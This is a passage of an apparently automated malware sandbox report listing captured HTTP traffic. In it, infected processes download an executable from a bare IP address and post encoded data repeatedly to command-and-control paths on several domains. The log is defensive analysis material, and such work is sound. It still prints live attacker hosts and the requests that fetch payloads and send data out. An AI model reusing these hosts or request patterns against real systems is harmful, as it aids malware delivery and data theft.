                                                                        14192.168.2.44988645.200.148.45801908C:\Windows\SysWOW64\recover.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:08.416538000 CET202OUTGET /dashboard/xl.exe HTTP/1.1
                                                                        Host: 45.200.148.45
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.449946104.21.74.79805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:33.940336943 CET764OUTPOST /irzc/ HTTP/1.1
                                                                        Host: www.tenmyk.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tenmyk.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.tenmyk.shop/irzc/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 71 61 6a 77 2f 59 47 4d 51 6f 45 71 31 69 39 73 73 6f 41 6c 77 45 6c 38 4e 66 30 71 36 6f 44 45 51 76 78 52 4b 51 52 73 42 50 6f 34 62 77 63 58 36 4e 77 64 6b 2f 70 78 32 42 78 4d 78 5a 63 35 56 56 63 72 43 32 44 50 7a 75 45 54 53 6b 68 66 6d 65 35 52 74 57 6b 71 50 32 66 42 55 49 47 50 71 66 4a 71 6d 38 79 69 71 55 30 6d 6a 33 57 5a 74 39 6a 55 52 46 48 35 30 4a 38 45 39 63 4e 69 79 50 4a 77 6c 73 52 6a 77 4e 4f 76 63 76 42 68 4d 30 31 64 54 45 48 58 32 5a 6a 64 75 74 42 63 66 47 75 4f 67 33 62 35 46 32 31 56 32 39 41 30 36 64 59 4e 5a 76 73 77 48 2f 52 53 4a 62 78 74 50 77 3d 3d
                                                                        Data Ascii: 9B_ppt=qajw/YGMQoEq1i9ssoAlwEl8Nf0q6oDEQvxRKQRsBPo4bwcX6Nwdk/px2BxMxZc5VVcrC2DPzuETSkhfme5RtWkqP2fBUIGPqfJqm8yiqU0mj3WZt9jURFH50J8E9cNiyPJwlsRjwNOvcvBhM01dTEHX2ZjdutBcfGuOg3b5F21V29A06dYNZvswH/RSJbxtPw==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.449953104.21.74.79805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:36.613003969 CET784OUTPOST /irzc/ HTTP/1.1
                                                                        Host: www.tenmyk.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tenmyk.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.tenmyk.shop/irzc/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 71 61 6a 77 2f 59 47 4d 51 6f 45 71 31 42 56 73 67 76 55 6c 68 30 6c 7a 42 2f 30 71 76 34 44 49 51 76 74 52 4b 54 63 33 43 39 38 34 61 55 59 58 37 4a 6b 64 6c 2f 70 78 35 68 78 4a 37 35 63 77 56 56 67 6a 43 32 76 50 7a 75 51 54 53 6c 52 66 68 74 42 53 73 47 6b 73 57 6d 66 44 61 6f 47 50 71 66 4a 71 6d 34 62 33 71 55 38 6d 67 45 4f 5a 76 5a 33 54 64 6c 48 34 67 5a 38 45 35 63 4e 6d 79 50 49 4b 6c 6f 51 32 77 4f 32 76 63 75 78 68 4d 6c 31 61 64 45 48 52 6f 70 69 49 34 75 45 74 59 33 66 6a 68 68 48 69 59 31 64 71 33 37 4e 75 72 73 35 61 4c 76 49 44 61 34 59 6d 45 59 4d 6b 55 33 6d 4a 6f 74 4a 37 7a 42 31 6c 63 4e 39 32 38 79 5a 66 43 68 6f 3d
                                                                        Data Ascii: 9B_ppt=qajw/YGMQoEq1BVsgvUlh0lzB/0qv4DIQvtRKTc3C984aUYX7Jkdl/px5hxJ75cwVVgjC2vPzuQTSlRfhtBSsGksWmfDaoGPqfJqm4b3qU8mgEOZvZ3TdlH4gZ8E5cNmyPIKloQ2wO2vcuxhMl1adEHRopiI4uEtY3fjhhHiY1dq37Nurs5aLvIDa4YmEYMkU3mJotJ7zB1lcN928yZfCho=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.449959104.21.74.79805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:39.273969889 CET10866OUTPOST /irzc/ HTTP/1.1
                                                                        Host: www.tenmyk.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tenmyk.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.tenmyk.shop/irzc/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 71 61 6a 77 2f 59 47 4d 51 6f 45 71 31 42 56 73 67 76 55 6c 68 30 6c 7a 42 2f 30 71 76 34 44 49 51 76 74 52 4b 54 63 33 43 39 6b 34 61 68 4d 58 36 72 4d 64 2f 2f 70 78 6e 52 78 49 37 35 64 67 56 52 4d 6e 43 32 79 74 7a 73 6f 54 55 47 4a 66 67 59 74 53 6e 47 6b 73 4c 32 66 47 55 49 48 48 71 66 35 75 6d 38 48 33 71 55 38 6d 67 46 2b 5a 68 64 6a 54 66 6c 48 35 30 4a 38 49 39 63 4e 43 79 50 77 77 6c 6f 64 4e 33 2b 57 76 64 4f 68 68 4c 58 64 61 52 45 48 54 70 70 6a 4c 34 70 4d 32 59 7a 48 42 68 68 62 63 59 32 42 71 30 38 51 73 2f 59 4e 6d 59 4e 45 68 50 59 73 63 4e 6f 55 6b 52 32 61 46 35 64 4a 55 7a 54 70 76 65 61 51 65 35 32 6c 62 64 46 6b 71 48 68 45 48 6c 32 6c 74 73 4e 76 2f 77 33 42 76 47 69 64 55 57 76 35 34 45 4c 70 68 34 30 74 51 77 46 4f 67 61 7a 74 71 4e 6f 70 7a 55 48 35 62 6e 33 69 46 6f 6c 75 46 36 63 68 77 4c 42 5a 6b 6c 37 78 57 4c 59 6a 34 74 6f 59 36 75 6e 4d 63 2f 63 47 4d 53 79 51 47 73 64 6e 56 35 4e 36 53 64 62 36 4a 76 44 76 44 66 43 47 33 50 6f 68 45 4b 43 4b [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=qajw/YGMQoEq1BVsgvUlh0lzB/0qv4DIQvtRKTc3C9k4ahMX6rMd//pxnRxI75dgVRMnC2ytzsoTUGJfgYtSnGksL2fGUIHHqf5um8H3qU8mgF+ZhdjTflH50J8I9cNCyPwwlodN3+WvdOhhLXdaREHTppjL4pM2YzHBhhbcY2Bq08Qs/YNmYNEhPYscNoUkR2aF5dJUzTpveaQe52lbdFkqHhEHl2ltsNv/w3BvGidUWv54ELph40tQwFOgaztqNopzUH5bn3iFoluF6chwLBZkl7xWLYj4toY6unMc/cGMSyQGsdnV5N6Sdb6JvDvDfCG3PohEKCKT22+OQJ4HvJIMMHtAITLfhFB4mJTui1h1smt3qVBx4ZHFLvybvJwCpLNSY4hayXrTh0oO+XKMUWjjjfE7jPnBHKl9RjvC+Y5MlbxKngiN8WTo2Uq+hD7cnNg8xkytBjWDM51cdptGeOTBGDBeg5DErRTmpwiMRB3lXPoC42nuEoS99ap4n7EMUWS4Y18zfW30OiUSZvwk4ln1oCLrhAkdX95opeH/eSM0WhXV6jFptNb2cEgVh7NrcbWv4IxwbND9gCCp+SmGfuuNmJuPmbl17WQIjVS1lC7+1YS2G/KIvtuOARARTl5/mvfvfVQ7nTXHwu7XZelpSLo9H/+kBQgPMfPel+bEHF2bR+G95Osbhfwpmmu6gpCKiIY1hizVr9wrTtToES6pSaefJmaEv670oDA6k53KVVI0q1UwemSxPJddE1LZDeXtxUGPKY66pR3iRtsNyvAWLIs08vxDtg6seKyDn1P2kSt8NI0gjsLfokV96aT9WRPIa5sPO9Lgv+2jzhsn8JnMAg7ZXxGbRllowj6skcHXvvWAQZ2lCfPVDi33oxOz2CNh2qrtvs42tcIYvs8xlhJET1Fsu4IdUEnUIYnsa7IgQOmxnSJqzK5oJI3l+r1TQQPqa0SIAPRqXt+2AKhIuIOsTHYtWDJR/aJFUiRsvTEVcaClh [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.449965104.21.74.79805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:41.928286076 CET510OUTGET /irzc/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=nYLQ8syZYIEqykNPtdlYwElZKL5y37q0UOpjKQ4AHu5ne0cyyooyzOVigyhm4upFaEQ5FVDL9IYlN2EnnOtWol53ChrSdq3Cue46r4D6qSkCmEW9rZbuVVo= HTTP/1.1
                                                                        Host: www.tenmyk.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:08:43.766669035 CET1236INHTTP/1.1 301 Moved Permanently
                                                                        Date: Fri, 13 Dec 2024 12:08:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        x-redirect-by: WordPress
                                                                        location: https://tenmyk.shop/irzc/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=nYLQ8syZYIEqykNPtdlYwElZKL5y37q0UOpjKQ4AHu5ne0cyyooyzOVigyhm4upFaEQ5FVDL9IYlN2EnnOtWol53ChrSdq3Cue46r4D6qSkCmEW9rZbuVVo=
                                                                        x-litespeed-cache-control: public,max-age=3600
                                                                        x-litespeed-tag: 3d9_HTTP.404,3d9_HTTP.301,3d9_404,3d9_URL.63e80ca7b6af420a78c880ebcf9fe9a1,3d9_
                                                                        x-litespeed-cache: miss
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1s817q3bM4qCtdZ%2BqrIrzcFvAjzPjeIQ6a4yPEO4egRbyf1kgrjGPJdkt%2BvGseqlbrUo3E39EuDZjwmx%2BIU6CUul5geR1owNp0ZJ%2BESYSRww5QhMlGP%2B2xXiZ79MqKTZm%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d753cb92436d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1849&rtt_var=924&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=510&delivery_rate=0&cwnd=160&unsent_bytes
                                                                        Data Raw:
                                                                        Data Ascii:
                                                                        Dec 13, 2024 13:08:43.766716003 CET41INData Raw: 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 0&cid=0000000000000000&ts=0&x=0"0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.4499843.33.130.190805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:49.617727041 CET767OUTPOST /fhx4/ HTTP/1.1
                                                                        Host: www.tlcatlas.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tlcatlas.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.tlcatlas.xyz/fhx4/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 47 59 65 51 2f 32 47 36 32 74 63 36 59 4e 6c 54 71 63 42 79 63 49 71 62 6a 55 2f 6d 7a 6d 2f 6f 35 68 42 35 6f 78 30 2f 43 4a 6e 49 7a 79 72 63 55 4a 70 41 63 4d 71 4f 68 31 6a 73 65 4b 77 67 58 6b 6f 58 57 66 36 31 4a 78 49 6b 52 54 2b 77 63 7a 6d 41 66 52 4c 53 48 41 75 4e 38 2b 43 75 38 50 71 4e 42 6b 50 72 6b 34 4e 4a 35 4a 4b 4b 63 78 61 6b 30 62 45 49 74 52 49 59 62 4d 45 56 5a 6e 4d 34 72 48 34 41 39 51 4e 47 46 42 30 63 51 63 78 4c 32 4b 66 72 67 50 33 78 41 58 6d 63 6f 69 45 44 51 31 68 44 76 38 68 69 2b 54 57 56 49 51 70 2f 61 59 49 47 6a 77 52 56 71 4c 52 39 4b 77 3d 3d
                                                                        Data Ascii: 9B_ppt=GYeQ/2G62tc6YNlTqcBycIqbjU/mzm/o5hB5ox0/CJnIzyrcUJpAcMqOh1jseKwgXkoXWf61JxIkRT+wczmAfRLSHAuN8+Cu8PqNBkPrk4NJ5JKKcxak0bEItRIYbMEVZnM4rH4A9QNGFB0cQcxL2KfrgP3xAXmcoiEDQ1hDv8hi+TWVIQp/aYIGjwRVqLR9Kw==
                                                                        Dec 13, 2024 13:08:50.697571993 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.4499923.33.130.190805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:52.276360035 CET787OUTPOST /fhx4/ HTTP/1.1
                                                                        Host: www.tlcatlas.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tlcatlas.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.tlcatlas.xyz/fhx4/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 47 59 65 51 2f 32 47 36 32 74 63 36 59 74 31 54 74 4c 31 79 51 34 72 70 39 6b 2f 6d 36 47 2f 73 35 68 46 35 6f 30 45 76 43 36 50 49 7a 58 48 63 47 59 70 41 5a 4d 71 4f 75 56 6a 6c 44 61 77 72 58 6b 6b 35 57 65 47 31 4a 78 63 6b 52 53 75 77 66 41 4f 44 65 42 4c 71 53 51 75 31 7a 65 43 75 38 50 71 4e 42 6b 61 4f 6b 34 46 4a 36 35 61 4b 54 30 75 6e 39 37 45 4c 37 68 49 59 66 4d 45 4a 5a 6e 4e 64 72 47 6c 62 39 56 4a 47 46 42 6b 63 58 49 64 4b 39 4b 66 70 76 76 32 47 50 48 36 58 6d 58 38 50 52 6d 42 35 78 2f 35 38 79 31 62 50 5a 68 49 6f 49 59 73 31 2b 33 59 68 6e 49 73 30 52 31 64 72 5a 51 5a 38 79 39 71 49 5a 45 52 4f 70 76 35 6f 6e 44 77 3d
                                                                        Data Ascii: 9B_ppt=GYeQ/2G62tc6Yt1TtL1yQ4rp9k/m6G/s5hF5o0EvC6PIzXHcGYpAZMqOuVjlDawrXkk5WeG1JxckRSuwfAODeBLqSQu1zeCu8PqNBkaOk4FJ65aKT0un97EL7hIYfMEJZnNdrGlb9VJGFBkcXIdK9Kfpvv2GPH6XmX8PRmB5x/58y1bPZhIoIYs1+3YhnIs0R1drZQZ8y9qIZEROpv5onDw=
                                                                        Dec 13, 2024 13:08:53.357635021 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.4499983.33.130.190805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:54.931969881 CET10869OUTPOST /fhx4/ HTTP/1.1
                                                                        Host: www.tlcatlas.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tlcatlas.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.tlcatlas.xyz/fhx4/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 47 59 65 51 2f 32 47 36 32 74 63 36 59 74 31 54 74 4c 31 79 51 34 72 70 39 6b 2f 6d 36 47 2f 73 35 68 46 35 6f 30 45 76 43 36 58 49 7a 42 54 63 55 72 42 41 65 4d 71 4f 6e 31 6a 67 44 61 77 79 58 67 41 39 57 65 4c 58 4a 79 6b 6b 4c 77 32 77 65 78 4f 44 52 42 4c 71 51 51 75 4f 38 2b 44 6d 38 50 61 4a 42 6b 4b 4f 6b 34 46 4a 36 36 79 4b 61 42 61 6e 37 37 45 49 74 52 49 75 62 4d 45 31 5a 6e 31 6e 72 47 67 75 38 6d 78 47 46 68 55 63 52 37 6c 4b 2f 71 66 76 6f 76 32 65 50 48 33 50 6d 58 4a 38 52 6e 6c 54 78 35 46 38 69 53 4b 6e 43 53 49 31 51 2b 45 61 75 6c 4d 61 6a 70 63 31 57 43 45 54 56 69 42 42 6f 4f 4f 38 62 48 77 66 74 63 55 70 31 47 45 71 65 30 30 50 68 41 30 78 39 2f 34 6b 58 32 74 52 6d 42 68 68 6c 58 2b 4f 32 77 4f 48 55 77 47 35 4d 6c 48 77 33 68 6d 47 6f 6b 68 59 6f 45 79 6e 59 61 77 6c 43 42 4f 58 38 6a 6a 32 44 45 69 6e 6a 34 6b 34 74 47 62 76 62 52 35 77 65 45 2b 68 47 4a 41 64 34 36 6c 5a 62 53 55 4e 37 77 5a 53 34 6d 58 64 7a 44 45 55 2b 64 34 42 4f 68 6c 70 4a 76 38 [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=GYeQ/2G62tc6Yt1TtL1yQ4rp9k/m6G/s5hF5o0EvC6XIzBTcUrBAeMqOn1jgDawyXgA9WeLXJykkLw2wexODRBLqQQuO8+Dm8PaJBkKOk4FJ66yKaBan77EItRIubME1Zn1nrGgu8mxGFhUcR7lK/qfvov2ePH3PmXJ8RnlTx5F8iSKnCSI1Q+EaulMajpc1WCETViBBoOO8bHwftcUp1GEqe00PhA0x9/4kX2tRmBhhlX+O2wOHUwG5MlHw3hmGokhYoEynYawlCBOX8jj2DEinj4k4tGbvbR5weE+hGJAd46lZbSUN7wZS4mXdzDEU+d4BOhlpJv8LSRDpPfvWC04jKIBJM4KC1z0tNvb8QJmCCZlSPldCneVkI9/Uoc5c6BKFJDP2HBKC5hvmiAZ1ChEUWO653TtxZXH4gc6uTgEYr5FSlQPOjBUwHRngLPqVl14aPWurWdzjVETfmMmD1QysshcQkmLWJSFiQbi2ge0a0l+89V0F5GVZp5aKKluFwnS+sFDQEkHtS2y1cjocA/kF8a4/bTBcqlmVN4hY3TqzkWkf7rzgrCLV2SigUDgCOdUi5w+8GZZZuBzV6eb7O79APIgcR+XzYJRywVIhGzHXMWksFMSlyokFfWJOE0v3PCqNfBoXdvcI5aoEz7oNnBRSf8+QKSh9EhpZ+hsDFktDhxjDx2hYxY00TK8QwH/RMv4s/BCQZUa5CDDUpksbL11OMMxsmEMFHOROiamnImE1L6DlLDiSvA78JphB1sVATU/WZD6csj4obseLWZrx0nwEeHzB+ohyLR2a2EjeZ/FthzgXqKgq2Ams4ZtuV5PjBo3Xd20jJRLlDRD4+rDtUhdJMYcg8WFRFY5naswJCUFgh2XCM3/u3KN40o8jBqtyzOxLFTChtgCIPz8lnRDqkgWvZUZCC/2IxVAHt6FmclysI4WG4/oKvtom+8foRwMFhltO6LfTgiLwM9Ue2P/kfe7FWxXh+jRMHgi3wUlwk7MbQ [TRUNCATED]
                                                                        Dec 13, 2024 13:08:56.035886049 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.4500043.33.130.190805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:08:57.590099096 CET511OUTGET /fhx4/?9B_ppt=La2w8Dit9+06W6UDzOpyWaSJwhDt0En/zF10s3Y0GLWWp3W5XYBJe4ay5kbJYoMqdVQ5UuPTPFY7LReVYSqnXR+zSVGbwszjyZbrKje2k/1r3Ly4XgGf/cA=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.tlcatlas.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:08:58.686669111 CET383INHTTP/1.1 200 OK
                                                                        content-type: text/html
                                                                        date: Fri, 13 Dec 2024 12:08:58 GMT
                                                                        content-length: 262
                                                                        connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 42 5f 70 70 74 3d 4c 61 32 77 38 44 69 74 39 2b 30 36 57 36 55 44 7a 4f 70 79 57 61 53 4a 77 68 44 74 30 45 6e 2f 7a 46 31 30 73 33 59 30 47 4c 57 57 70 33 57 35 58 59 42 4a 65 34 61 79 35 6b 62 4a 59 6f 4d 71 64 56 51 35 55 75 50 54 50 46 59 37 4c 52 65 56 59 53 71 6e 58 52 2b 7a 53 56 47 62 77 73 7a 6a 79 5a 62 72 4b 6a 65 32 6b 2f 31 72 33 4c 79 34 58 67 47 66 2f 63 41 3d 26 53 62 76 38 49 3d 52 66 50 44 59 76 49 48 74 4a 58 70 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9B_ppt=La2w8Dit9+06W6UDzOpyWaSJwhDt0En/zF10s3Y0GLWWp3W5XYBJe4ay5kbJYoMqdVQ5UuPTPFY7LReVYSqnXR+zSVGbwszjyZbrKje2k/1r3Ly4XgGf/cA=&Sbv8I=RfPDYvIHtJXp8"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.45002013.248.169.48805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:04.211534023 CET761OUTPOST /i7vz/ HTTP/1.1
                                                                        Host: www.xphone.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.xphone.net
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.xphone.net/i7vz/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 5a 71 66 56 6a 42 6c 68 75 71 50 63 35 56 54 47 6a 48 53 58 4c 45 42 4b 6c 6e 69 2f 4a 4c 4e 74 78 66 71 4a 4d 35 4f 6b 4f 6c 43 35 43 73 44 69 75 61 57 43 4d 57 58 56 63 56 33 44 4b 4b 41 5a 35 4f 6e 42 44 68 61 5a 67 68 77 78 4b 33 72 6d 6c 33 5a 37 68 39 6d 6c 61 51 4a 57 6a 54 31 56 68 46 31 37 41 53 67 64 51 51 6e 50 7a 4d 65 7a 75 39 4f 69 46 6a 4b 61 69 79 35 2f 65 2f 46 6d 34 78 2b 62 39 34 41 6b 44 6f 50 41 63 7a 74 2b 54 46 46 37 43 6c 46 34 62 56 6b 54 39 32 31 79 62 6f 50 78 78 6e 46 6c 4d 67 48 76 33 34 4a 77 36 51 47 70 79 51 68 44 34 65 4d 52 52 4d 62 5a 53 67 3d 3d
                                                                        Data Ascii: 9B_ppt=ZqfVjBlhuqPc5VTGjHSXLEBKlni/JLNtxfqJM5OkOlC5CsDiuaWCMWXVcV3DKKAZ5OnBDhaZghwxK3rml3Z7h9mlaQJWjT1VhF17ASgdQQnPzMezu9OiFjKaiy5/e/Fm4x+b94AkDoPAczt+TFF7ClF4bVkT921yboPxxnFlMgHv34Jw6QGpyQhD4eMRRMbZSg==
                                                                        Dec 13, 2024 13:09:05.300121069 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.45002713.248.169.48805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:06.868469000 CET781OUTPOST /i7vz/ HTTP/1.1
                                                                        Host: www.xphone.net
